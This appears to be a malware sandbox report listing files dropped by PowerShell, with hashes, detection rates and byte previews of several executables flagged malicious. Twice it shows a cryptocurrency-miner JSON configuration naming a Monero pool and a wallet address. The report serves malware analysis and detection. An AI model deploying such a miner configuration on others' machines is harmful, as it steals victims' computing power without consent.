                                                                                                                                                                                                                              Preview:{. "autosave": false,. "cpu": {. ."enabled": true,. ."max-threads-hint": 50. },. "opencl": true,. "cuda": true,. "pools": [. {. "url": "xmrpool.eu:9999",. "user": "41sTU9hpM5ecGjN4GYhYhL8H5aP1fQC4B2Usrf3qexeG6fcM6EBaHF35JMcwsZ8q4KjMizeTrDw8jeuaD7boQqjA3UFo85L",. "keepalive": true,. "tls": true. }. ].}.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):331264
                                                                                                                                                                                                                              Entropy (8bit):5.532137859819159
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:yejl5QCuDlXW4+DiErv2yKU9pclGrDkXNBe:vl5QCKdW4+DiNlXNBe
                                                                                                                                                                                                                              MD5:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                              SHA1:47C112C23C7BDF2AF24A20BD512F91FF6AF76BC6
                                                                                                                                                                                                                              SHA-256:F689EE9AF94B00E9E3F0BB072B34CAAF207F32DCB4F5782FC9CA351DF9A06C97
                                                                                                                                                                                                                              SHA-512:073F5AE0D4FFEDB5EDB3B92B8E19BEA2C482A3AD7AB02ED71955D3E55AA44A297307FE4334D28C6F7683CB02D40B4313E560C9049507B16A8C5D6EE0A0F0071F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: #U9644#U4ef6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: #U9644#U4ef6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: SecuriteInfo.com.PUA.Tool.Nssm.6.15973.27062.msi, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: rapV1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: W0GMc7Catw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........HK.)%..)%..)%..{...)%..{...)%...^..)%..)$.e)%..{...)%..{...)%..{...)%.Rich.)%.................PE..d....@.T..........#............................@.............................P...............................................................v..........._........................................................................... ...............................text...-........................... ..`.rdata...m... ...n..................@..@.data....>...........v..............@....pdata..............................@..@.rsrc...._.......`..................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5559296
                                                                                                                                                                                                                              Entropy (8bit):6.91179307373266
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:riFqMELV+H7BLF/MsnU6TRfrguw5Sf+x2/+52Q+:ri
                                                                                                                                                                                                                              MD5:76CC0193955695FEE0F72CD0006E86A4
                                                                                                                                                                                                                              SHA1:D14AAAD60F3F0E63A3DFD0224B922D9F16079E61
                                                                                                                                                                                                                              SHA-256:3BA326D21BB242488C0284EBC32FD6DBC94025ECAB34862015A5C95EB178C961
                                                                                                                                                                                                                              SHA-512:EF0B48E9B80BBEA6AD210CE1C38B7E7031B72191150825C220F37326A01FDD3331E1E60911A24D060921E352B7F501D863039921B30FA9B975A756A686308DB6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_V..>8R.>8R.>8RC..R.>8R.>9R.>8RZ..R.>8RZ..R.>8RZ..R.>8R...R.>8R...R.>8R...R.>8RRich.>8R........................PE..d......e.........." .....r....T..............................................0U...........`...........................................T.p....T.(.............U.............. U.......................................T.p............................................text....p.......r.................. ..`.rdata..P2T......4T..v..............@..@.data....5....T.......T.............@....pdata........U.......T.............@..@.reloc....... U.......T.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44733952
                                                                                                                                                                                                                              Entropy (8bit):6.608208262250489
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:786432:XBsHMHxPHy0EX5Pe1R7gjOUXFhgsko6sMXcy:XPHy3PeH7cf/Qv
                                                                                                                                                                                                                              MD5:7EC47BBA001C5BC96F6B4D40CD9FEC97
                                                                                                                                                                                                                              SHA1:AD67EDFC0728BB7D74D66CB9580840B5A426D59E
                                                                                                                                                                                                                              SHA-256:E55461F252B519478E9BF09F8BD1F0F3B6E3064C9270FAC6A29D6EB23216835C
                                                                                                                                                                                                                              SHA-512:8B63E6162C5C303CF95A7BA621EF2879B63C79D321A829A49CD50083BC30C3C49C7326B6242F92D29B77CEDDDBA1A5C9DDEC62E8955DDCE1A2F11CB9B4B00E0E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............._.._.._.*L_.._...^.._.._.._.*I_.._.._.._...^.._...^.._...^.._]uE_.._...^.._...^.._...^.._...^@._...^.._..}_.._...^.._Rich.._........PE..d...!..e.........." .........N......D.;......................................@............`..........................................Mx......Ox.x................y........... ......0.e.....................P.f.(...P.e..............................................text............................... ..`.rdata..............................@..@.data.....)..px......Nx.............@....pdata...y.......z..................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49374208
                                                                                                                                                                                                                              Entropy (8bit):6.09495089462158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:TCoJ5oT1251rgz1dg+1frLN1GtrH1g1D41G1ZoQxyH0yHhdWm+cZkQx5Q0VkJVJu:TCC55hgzrg+txO7QsA1ZoQ7QoxgN
                                                                                                                                                                                                                              MD5:D5A072278E78E6E2D599A69E6C026D04
                                                                                                                                                                                                                              SHA1:5A37CC8953B06BFDCE7A33612C68D7A7D40BA4C2
                                                                                                                                                                                                                              SHA-256:3B9173261DF464C7E516CF6B2B794840BFA9292877EAEC5CF00175D5F36505E0
                                                                                                                                                                                                                              SHA-512:65BA86A6C417EA0166167AA87CE592D213ACA00BFABEADF49E0464CBD86DC45E9F66C045E8F8860FE4D94E0F53EF93D178B55BB6391DF71406801AC14F052537
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$........J..$...$...$..'...$..!.#.$.. ...$......$...!...$... ...$...'...$..%...$...%...$.....$...%.@.$.a. ...$.a.!...$.Y. ...$.Y.!...$.Y.$...$.Y....$......$.Y.&...$.Rich..$.........................PE..d....o.e.........." ......................................................................`..........................................&.......(..P....P...Y...p..0?..............x...............................(... ...8............................................text............................... ..`.rdata..JF.......H..................@..@.data...$,...@.......(..............@....pdata..0?...p...@...>..............@..@.nv_fatb.u.......v...~..............@..@.nvFatBi.....0......................@..@_RDATA.......@......................@..@.rsrc....Y...P...Z..................@..@.reloc..x............R..............@..B................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6360576
                                                                                                                                                                                                                              Entropy (8bit):6.6286185002812745
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:AwHlVzThdquIJ3mH6KfTSr2tJCkN3dOauqMAC2Taf43TZquOE2:fVz5CkN3dXuq9Taf4jLt2
                                                                                                                                                                                                                              MD5:C0F8959614AE06561216158D78A787E5
                                                                                                                                                                                                                              SHA1:73167D1FD0CEE1C96A6505606D21CBFE4369EB00
                                                                                                                                                                                                                              SHA-256:E199D88569FB54346D5FA20EE7B59B2EA6F16F4ECCA3EA1E1C937B11AAB7B2B0
                                                                                                                                                                                                                              SHA-512:A24FCF344D08C64AC301D5E4979F062B5E28E8E4ACF1D2790916149FFE7726B0C4A11E0775AEBA6B841D2D5081E1BD13E2B80390BF9BFBC44D67E54EC07CD746
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................f.......f..>....k.......k.......k.......f..........t....f......8k......8k......8k......8kR.......:.....8k......Rich............................PE..d.....'f..........".......A..`I.......=........@.............................`............`...................................................[......@...Y... .......................RX......................TX.(....RX.8.............A.`............................text.....A.......A................. ..`.rdata...h....A..j....A.............@..@.data...4.*.. \.......\.............@....pdata....... ........].............@..@_RANDOMXV............_.............@..`_TEXT_CN.&.......(...._.............@..`_TEXT_CN.............._.............@..`_RDATA.......0........_.............@..@.rsrc....Y...@...Z...._.............@..@.reloc...............X`.............@..B................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11887
                                                                                                                                                                                                                              Entropy (8bit):4.901437212034066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                                                                                                                                                                                              MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                                                                                                                                                                                              SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                                                                                                                                                                                              SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                                                                                                                                                                                              SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3292
                                                                                                                                                                                                                              Entropy (8bit):5.473128761440431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:sAzlHxvJ9qrfIfl7KfOaJ5Eo9AdrxmqJ7:l1xmrfP2aLL2+qJ7
                                                                                                                                                                                                                              MD5:2BFF0CF4B98786CDECF3A8A245B84287
                                                                                                                                                                                                                              SHA1:B2DCF641F9665FFFEC0C74B2E527F6963AF1B34F
                                                                                                                                                                                                                              SHA-256:7333C67649501ECE3D98EA0562599D99BFDEDB5231814B3B2AF7DBAA97A7A09F
                                                                                                                                                                                                                              SHA-512:47919AD5E6BEA0E6417A20C4657CF94A2DDD59DFC5A6D1F2BB8AAC68B02EFFBD5C15F258B62BB60909F42736F927C58A01A46F3056481DE02C761DFDD5776D5F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14544
                                                                                                                                                                                                                              Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):388
                                                                                                                                                                                                                              Entropy (8bit):4.695996037746329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:XqT6eVQMH6iM+kQgYUoVAA+JL4erzsiAadDuYHit8LOPFkr:XqT6whkI8L4erLTdD/zLRr
                                                                                                                                                                                                                              MD5:76689EE509335B1E13050DBD78C9E08C
                                                                                                                                                                                                                              SHA1:ADF41F06B8C62CFD67954986B41F67A8576B3E75
                                                                                                                                                                                                                              SHA-256:B799B50DD50BB3015F6D924CFA979DEE0B235D1338EAC2EF9B3ABC75B70C07EF
                                                                                                                                                                                                                              SHA-512:B8793ED557E5E544C9367C7F315DCDB37D6260611540400A8E84D26C43521C43B8414C74F2FAEC30B98BCE5EC48585B26BAA092D5AFA7DF8615740FC280E5AAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{. "autosave": false,. "cpu": {. ."enabled": true,. ."max-threads-hint": 50. },. "opencl": true,. "cuda": true,. "pools": [. {. "url": "xmrpool.eu:9999",. "user": "41sTU9hpM5ecGjN4GYhYhL8H5aP1fQC4B2Usrf3qexeG6fcM6EBaHF35JMcwsZ8q4KjMizeTrDw8jeuaD7boQqjA3UFo85L",. "keepalive": true,. "tls": true. }. ].}.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25002518
                                                                                                                                                                                                                              Entropy (8bit):7.99490926460399
                                                                                                                                                                                                                              Encrypted:true
